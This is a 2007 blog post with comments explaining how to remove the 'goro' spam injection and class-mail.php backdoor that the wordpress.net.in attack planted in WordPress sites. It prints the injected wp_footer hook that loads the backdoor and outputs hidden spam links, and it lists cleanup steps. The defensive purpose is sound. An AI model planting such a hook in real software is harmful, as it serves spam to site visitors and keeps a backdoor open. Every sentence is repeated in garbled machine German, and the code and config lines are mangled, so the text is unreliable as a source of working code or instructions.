I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’sa backdoor (wordpress.net.in). Ich fand dieses beim Browsen WordPress Support-Forum, einige dieser Opfer aktualisieren ihre default_filters.php und Upload-Klasse-Mail.php innerhalb ihrer WordPress ohne sich dessen bewusst, dass es eine Hintertür (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php . Es gibt keine Klasse-Mail.php in WordPress, außer Klasse-phpmailer.php. So don’t get confuse by it. Also nicht verwirren von ihr.
Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes. Unten ist eine schnelle Abhilfe, wie Sie entfernt das störende goro spamware Injektion, bevor Sie Google verbannt aus dem Internet-Leitungen.
Workaround Abhilfe
- For temporary disable remote include in php.ini settings. Bei kurzfristigen deaktivieren Fernbedienung in der php.ini Einstellungen.
;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;; ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. ;;;;;;;;;;;;;;;;;;; Fopen-Wrapper; ;;;;;;;;;;;;;;;;;;; die Zulässigkeit der Behandlung von URLs (zB http:// oder ftp://) als Dateien. allow_url_fopen = off allow_url_include = off allow_url_fopen = off allow_url_include = off
- Check your .htaccess for suspicious redirect. Überprüfen Sie die. Htaccess für verdächtige umleiten.
- Find class-mail.php inside “*/wp-includes/” directory and removed it. Finden Sie Klasse-Mail.php inside "* / wp-includes /"-Verzeichnis und entfernt sie.
- Find the following code inside “*/wp-includes/default_filters.php” and removed it Suchen Sie den folgenden Code innerhalb "* / wp-includes/default_filters.php" und entfernt sie
add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775'); function wpc7c16<>b8466d864eeefd20050625c7775() { @include(’./wp-includes/class-mail.php’); if(sizeof($wparr)>0){ echo “!div id=\”goro\”!”; foreach($wparr as $k=>$v){ echo ““.ucwords($v[’key’]).”\n”; if($i ==$inum) break; } echo “!/div!”.$_footer; } } add_action ( 'wp_footer', 'wpc7c16b8466d864eeefd20050625c7775'); Funktion wpc7c16 <> b8466d864eeefd20050625c7775 () (@ include ( '. / wp-includes / class-Mail.php'); if (sizeof ($ wparr)> 0) (echo " ! div id = \ "goro \"! "; foreach ($ wparr as $ k => $ v) (echo" ". ucwords ($ v [ 'key'])." \ n"; if ($ i = = $ inum) break;) echo "! / div !".$_ footer;)) Robots.txt Exclusion Robots.txt Ausschluss
Optional - Prevent googlebot from indexing the static spam page. Optional - verhindern, dass Googlebot die Indizierung der statischen Spam-Seite.
Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”. Melden Sie sich Wordpress Admin-> Verwalten> Dateien> Andere Dateien → Key in "robots.txt". Add the following code. Fügen Sie den folgenden Code.User-agent: Googlebot Disallow: /*?* Disallow: /*? User-agent: Googlebot Disallow: / *? * Disallow: / *?Refer robots.txt . Siehe "robots.txt".
Possible WordPress class (suspicious) files that would be tempered Mögliche WordPress Klasse (verdächtig) Dateien, wäre temperierten
Md5 checksum the following files, compare it with official versions from WordPress Release Archive . MD5 Prüfsumme die folgenden Dateien, vergleichen Sie ihn mit offiziellen Versionen von WordPress Presse-Archiv.
The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Die oben genannten Methoden nur entfernen und behinderte die Spam-Links, es gibt keine Garantie dafür, dass sie geschützt werden Sie von zukünftigen Schwachstellen. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade . Backup (oder exportieren Sie Ihre Post mit WordPress eXtended RSS-WRX) und führen Sie eine vollständige Aktualisierung.
- Dec 13, 2007 Dezember 13, 2007
I just notice this recently. Ich habe gerade vor kurzem diesen Hinweis. You’ll need to check your site HTTP Header. Sie müssen überprüfen Sie Ihre Website HTTP-Header. Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500) . Die meisten der entführte Websites nicht Response dank korrekter HTTP-Header (400 <> 500). My guess is they did this to cloak from being crawl by search engine spiders. Meine Vermutung ist, sie tat dies auf Mantel von Crawl-Suchmaschine von Spinnen. If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner . Wenn Sie hatte gereinigt alle infizierten Dateien und Ihren Kopf nicht richtig Antwort bekommen rookit Scanner.
Check your website status header, try cloak your browser (UA) as Search Engine Crawler. Überprüfen Sie Ihre Website-Status-Header, versuchen Sie es mit Ihrem Browser Mantel (UA) als Suchmaschine Crawler. The following screenshot will show you how to setup this at web-sniffer.net. Der folgende Screenshot zeigt Ihnen, wie Sie in diesem Web-sniffer.net.

This methods may not work if the cloaking scripts used IP base tracking. Diese Methoden können nicht funktionieren, wenn die Cloaking Skripte verwendet IP-Tracking-Basis. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver). Also versuchen Sie es in verschiedenen User-Agent String (dh: inoktomi, askjeeves, ia_archiver).
Firefox Browser Firefox Browser
You can also override your useragent string with firefox ↓. Sie können auch überschreiben Ihre Useragent-String mit Firefox ↓.
about:config → general.useragent.overide = ‘ ua strings ‘ about: config → general.useragent.overide = 'ua strings'
Wordpress.net.in Backdoor Wordpress.net.in Hintertür
Wordpress.net.in Doorway Wordpress.net.in Portal
Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/ Dezember 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/
Backdoor Files Hintertür Dateien
inside wp-includes directory. Insider-wp-includes-Verzeichnis.
- compat.php - (replace with latest version) compat.php - (ersetzen Sie mit den neuesten Fassung)
- class-mail.php delete Klasse-Mail.php löschen
scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins . Scan & Hintertür entfernt alle Dateien, und erstellen Sie eine. htaccess-Dateien innerhalb des wp-includes & wp-content/plugins. Then add the following code to disabled directory listing (prevent informations leak & Directory search index). Dann fügen Sie den folgenden Code für behinderte Verzeichnisliste (verhindern, dass Informationen Leck & Directory-Suchindex).
Options -Indexes Options-Indexes Wordpress.net.in New Partner Wordpress.net.in neuer Partner
Feb 23th 2008 , We found a similar signature like wordpress.net.in at qwetro.com (germany). 23. Februar 2008 fanden wir eine ähnliche Signatur wie wordpress.net.in in qwetro.com (Deutschland). Probably from the same attacker with different agenda. Vermutlich aus dem gleichen Angreifer mit unterschiedlichen Tagesordnung.
Related Posts Verwandte Beiträge
- Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in) Bluehost HostMonster CEO's Blog gehackt (wordpress.net.in)
- Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II Matt Heaton bluehost Hostmonster CEO's wieder gehackt - Strike II
External Links Externe Links
- Websniffer View HTTP Request and Response Header Websniffer anzeigen HTTP-Request-und Response-Header
- Wordpress Support Forum Wordpress Support-Forum
- National Vulnerability Database Wordpress 2.0 > 2.0.6 National Vulnerability Database Wordpress 2,0> 2.0.6










16 Responses to “How to Remove Wordpress.net.in Spam Injection” 16 Responses to "How to Remove Wordpress.net.in Spam-Injection"
[...] na enak problem, vendar o?itno jih je zelo malo rešilo vse skupaj. [...] Na enak Problem, vendar o? Itno jih je zelo malo rešilo vse insgesamt. Ampak Google dela ?udeže: How to Removed Wordpress.net.in Spam Injection Infected by ‘Goro’ Spam class-mail.php Backdoor In rešitev je [...] Ampak Google dela? Udeže: Wie entfernt Wordpress.net.in Spam-Injection Infizierte durch "Goro" Spam-Klasse Mail.php Hintertür in rešitev je [...]
[...] I’ve find some useful information on how to clean that mess on Kakkoi: How to Removed Wordpress.net.in Spam Injection. [...] Ich habe ein paar nützliche Informationen darüber, wie sauber das Chaos in Kakkoi: Wie entfernt Wordpress.net.in Spam-Injection. [...]
[...] wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...] Wordpress.net.in ergab eine Reihe von Seiten, darunter ein Blog-Eintrag von Avice De'vereux, dass die beschriebenen Symptome und erklärten, sie seien durch einen Spam-Hijack Injektion von [...]
[...] is what Gordon Dewis discovered: Googling wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...] Ist das, was Gordon Dewis entdeckt: googeln wordpress.net.in ergab eine Reihe von Seiten, darunter ein Blog-Eintrag von Avice De'vereux, dass die beschriebenen Symptome und erklärten, sie seien durch einen Spam-Injektion von Hijack [.. .]
[...] leads me to Avice’s perfectly wonderful life saving post, where she instructs how to remove [...] [...] Führt mich zu Avice's perfekt wunderbare lebensrettende Post, wo sie beauftragt, wie Sie [...]
[...] en is alle gehackte code gevonden. [...] En ist alle gehackte Code gevonden. Mocht je last hebben van de div id=”Goro” hack kijk dan eens hier voor handige tips voor het verwijderen. Mocht je letzten hebben van de div id = "Goro" Hack kijk dan eens hier voor handige tips voor het verwijderen. Alhoewel ik voorlopig geen PC klusjes zou doen gaan we toch [...] Alhoewel ik voorlopig geen PC klusjes zou doen Gaan wir Toch [...]
I got hacked to, mine was spam links to Ich habe gehackt, Mine wurde Spam-Links zu
donaldsensing.com:6666 donaldsensing.com: 6666[...] Related: Blogs Take Center Stage For Marketers And For Google How to Remove Wordpress.net.in Spam Injection [...] [...] Verwandte: Blogs Take Center Stage für Werbetreibende und für Google, wie entfernen Wordpress.net.in Spam-Injektion [...]
I'm not sure who is "alxumuk" real name is, but there is an editor at DMOZ with similar display name. Ich bin mir nicht sicher, ist "alxumuk" richtiger Name ist, aber es ist Redakteurin bei DMOZ-Display mit ähnlichen Namen.
Lack Resources Fehlende RessourcenATM I only have a few raw accesslog from Murray's blog & Jens's blog . Matt Heaton never replies. ATM habe ich nur ein paar rohe accesslog von Murray's Blog & Jens's blog. Matt Heaton nie Antworten.
I hope that Mr. Goro got careless and show his footprint, I need more raw access log. Ich hoffe, dass Herr Goro bekam sorglosen und zeigen seinen Fußabdruck, brauche ich mehr Roh-Zugang anmelden. Send it to my email Senden Sie ihn an meine E-Mail
[...] might go Here to learn the way to remove the Spam [...] [...] Könnte hier, um zu erfahren, wie der zur Beseitigung der Spam-[...]
Co-Founder of Mozilla Project WordPress Blog's Hacked... Blake Ross, the Co-Founder of Mozilla Project WordPress Blog's Hacked by Wordpress.net.in Blackhat Spammer. Co-Gründer von Mozilla-Projekt WordPress Blog's Hacked ... Blake Ross, der Co-Gründer von Mozilla-Projekt WordPress Blog's Hacked by Wordpress.net.in BlackHat Spammer. ......
[...] het te maken had met spam injection hijack by wordpress.net.in. [...] Het te maken traf Spam Injektion von Hijack wordpress.net.in. Meer info over het probleem kan je hier vinden. Meer info über het probleem kan je hier vinden. De eenvoudigste oplossing voor het probleem, is een nieuwe versie van wordpress erop [...] De eenvoudigste Lösung voor het probleem, is een nieuwe versie van wordpress erop [...]